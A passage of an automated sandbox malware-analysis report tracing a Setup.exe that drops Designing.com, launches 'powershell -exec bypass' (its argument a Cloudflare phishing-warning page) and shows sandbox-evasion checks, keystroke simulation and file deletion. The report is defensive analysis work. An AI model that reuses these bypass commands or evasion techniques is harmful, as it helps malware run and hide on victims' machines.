                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: Setup.exeStatic file information: File size 73409776 > 1048576
                Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <Jump to behavior
                Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DC0DE6 push ecx; ret 12_2_00DC0DF9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_071B05D8 push FFFFFFE8h; iretd 16_2_071B05DD

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\124531\Designing.comJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\124531\Designing.comJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E326DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,12_2_00E326DD
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DBFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_00DBFC7C
                Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_12-103965
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2030Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 647Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comAPI coverage: 3.7 %
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com TID: 1576Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6980Thread sleep count: 2030 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2800Thread sleep count: 647 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 348Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E0DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00E0DC54
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E1A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00E1A087
